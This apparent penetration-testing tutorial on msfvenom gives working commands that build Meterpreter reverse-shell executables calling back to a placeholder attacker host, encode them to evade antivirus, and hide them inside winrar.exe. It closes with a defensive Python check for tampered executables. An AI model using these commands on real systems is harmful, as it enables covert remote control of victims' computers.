# msfvenom

A **client-side attack** happens when an attacker tricks a user into running a harmful file on their computer. Once the file runs, it secretly connects back to the attacker.

Hackers often use **social engineering** to make people open infected documents or programs. Instead of attacking weak software or services, they **target human mistakes**, such as clicking on unsafe links or opening suspicious files.

Since this type of attack places a harmful file on the user’s computer, attackers must be careful to avoid detection by **antivirus (AV) software**.

## What is msfvenom?

**msfvenom** is a command-line tool used to create and encode harmful payloads for different operating systems and web servers. It combines two tools: **msfpayload** and **msfencode**.

With msfvenom, we can create a dangerous payload (like a **Meterpreter** payload) that can be sent to a target computer. Once the target runs the payload, it connects back to us and gives us remote control over their system.

{% code overflow="wrap" %}

```bash
# list the available payloads; two entries from the output are shown below
msfvenom --list payloads

# windows/x64/meterpreter/reverse_http
# linux/x64/meterpreter/reverse_http

# build a 32-bit Windows Meterpreter reverse TCP payload as a Windows executable
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=[ATTACK IP] LPORT=[PORT] -f exe > /home/payloadx86.exe

# list the available output formats (exe, dll, elf, raw, ...)
msfvenom --list formats
```

{% endcode %}

## Encoding Payloads

Since this type of attack involves placing a malicious file on the client’s system (disk), attackers must be aware of **antivirus (AV) detection**. Most AV software uses **signature-based detection** to find harmful files or programs. To bypass older AV systems, attackers can **encode** their payloads. **Encoding** changes the payload's code in a way that alters its signature, making it harder for AV software to recognize it.

**Shellcode** is a small piece of code used as part of an attack. It’s called "shellcode" because it gives the attacker access to a **command shell** on the target system, allowing them to run commands remotely.

{% code overflow="wrap" %}

```bash
x86/shikata_ga_nai # polymorphic XOR additive feedback encoder
```

{% endcode %}

**x86/shikata\_ga\_nai** is a **polymorphic XOR additive feedback encoder** used in tools like **msfvenom** to encode payloads and help them avoid detection by antivirus software.

* **x86** refers to the architecture of the system, typically meaning 32-bit Intel-based processors.
* **Shikata\_ga\_nai** is the name of this encoding technique. It comes from a Japanese phrase meaning "it can't be helped," symbolizing the persistence and effectiveness of the encoder.
* **Polymorphic** means the encoder changes the appearance of the payload each time it’s used, so the signature looks different, even though the payload itself remains the same.
* **XOR additive feedback** is the method used to modify the payload's code. Each word of the shellcode is XORed with a key, and the key is then updated with the word just decoded (the feedback), so the encoded bytes no longer contain the patterns antivirus programs recognize as malicious.

This encoder helps disguise the payload, making it harder for signature-based antivirus tools to detect it.

{% code overflow="wrap" %}

```bash
# encode the payload once with x86/shikata_ga_nai
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=[ATTACK IP] LPORT=[PORT] -e x86/shikata_ga_nai -f exe > /home/payloadx86.exe

# -i sets the number of encoding iterations (here the payload is encoded 10 times)
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=[ATTACK IP] LPORT=[PORT] -i 10 -e x86/shikata_ga_nai -f exe > /home/payloadx86.exe
```

{% endcode %}

## Injecting Payloads into Windows Portable Executables

{% code overflow="wrap" %}

```bash
# -x / --template: use an existing executable as the template the payload is injected into
# -k / --keep: preserve the template's original behaviour and run the payload in a new thread
#              (without -k the program only runs the payload and loses its normal functionality)

# using winrar.exe as the template
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[ATTACK IP] LPORT=[PORT] -e x86/shikata_ga_nai -i 10 -f exe -x winrar.exe > /home/winrar.exe

# same, but keeping WinRAR's original functionality (-k)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[ATTACK IP] LPORT=[PORT] -e x86/shikata_ga_nai -i 10 -f exe -k -x winrar.exe > /home/winrar.exe
```

{% endcode %}
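The following is an added example, not code from msfvenom or the original page, showing two checks a defender can run on an executable suspected of having been used as a template (`-x`): whether its SHA-256 still matches the hash the vendor published, and whether its section table contains a section mapped both writable and executable. Both PE images are constructed in the file with `struct` (a minimal PE32 header and section table holding placeholder bytes, no real program), the "vendor hash" is simply the hash of the untouched image, and the section name `.inj` is an invented placeholder rather than anything msfvenom is claimed to produce.

```python
"""Defender-side checks on a possibly tampered Windows executable: vendor hash
comparison and a scan of the section table for writable+executable sections.

Added example, not from the original page and not msfvenom's own code. The
PE images below are constructed here; ".inj" is a placeholder section name.
"""
import hashlib
import struct

# section characteristic flags from the PE/COFF specification
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

FILE_ALIGN = 0x200
SECTION_ALIGN = 0x1000


def _align(n: int, a: int) -> int:
    return (n + a - 1) & ~(a - 1)


def build_pe(sections) -> bytes:
    """Build a minimal PE32 image from [(name, characteristics, raw_bytes)]:
    64-byte DOS header, PE signature, COFF header, 224-byte optional header
    (zeroed apart from its magic), the section table, then the section data."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\x00" * 222
    headers_len = len(dos) + 4 + len(coff) + len(opt) + 40 * len(sections)
    first_raw = _align(headers_len, FILE_ALIGN)
    table, body, va = b"", b"", SECTION_ALIGN
    for name, chars, data in sections:
        raw_size = _align(len(data), FILE_ALIGN)
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\x00"),
                             len(data), va, raw_size, first_raw + len(body),
                             0, 0, 0, 0, chars)
        body += data.ljust(raw_size, b"\x00")
        va += _align(len(data), SECTION_ALIGN)
    image = dos + b"PE\x00\x00" + coff + opt + table
    return image.ljust(first_raw, b"\x00") + body


def parse_sections(image: bytes):
    """Walk the section table; return [(name, characteristics, raw_data)]."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, e_lfanew + 4)
    table = e_lfanew + 4 + 20 + opt_size
    out = []
    for i in range(nsec):
        name, vsize, _, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", image, table + 40 * i)
        out.append((name.rstrip(b"\x00").decode(), chars,
                    image[raw_ptr:raw_ptr + raw_size][:vsize]))
    return out


def rwx_sections(image: bytes):
    """Names of sections mapped both writable and executable."""
    return [n for n, c, _ in parse_sections(image)
            if c & IMAGE_SCN_MEM_WRITE and c & IMAGE_SCN_MEM_EXECUTE]


def sha256(image: bytes) -> str:
    return hashlib.sha256(image).hexdigest()


def inspect_image(image: bytes, vendor_sha256: str):
    """Findings a defender would act on; an empty list means nothing suspicious."""
    findings = []
    if sha256(image) != vendor_sha256:
        findings.append("sha256 differs from the vendor-published hash")
    findings += [f"section {n} is writable and executable" for n in rwx_sections(image)]
    return findings


# constructed stand-ins: placeholder bytes, no real program inside
TEXT = b"\xC3" * 32                  # 32 'ret' instructions as filler
DATA = b"constructed data\x00"
BASE = [(".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, TEXT),
        (".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, DATA)]
CLEAN = build_pe(BASE)
VENDOR_SHA256 = sha256(CLEAN)        # stands in for the hash the vendor publishes
# the same image with an extra read/write/execute section appended (".inj" is a placeholder)
TAMPERED = build_pe(BASE + [(".inj", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE
                             | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, b"\xCC" * 64)])

if __name__ == "__main__":
    print("clean:   ", inspect_image(CLEAN, VENDOR_SHA256))
    print("tampered:", inspect_image(TAMPERED, VENDOR_SHA256))
```

The hash comparison is the reliable check: any byte changed in the template changes the digest, and on Windows the same change also invalidates a vendor's Authenticode signature (`Get-AuthenticodeSignature` reports it as not valid). The writable-and-executable section scan is only a heuristic, since packed or self-modifying legitimate programs use such sections too, so treat a hit as a reason to look closer rather than as proof of tampering.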
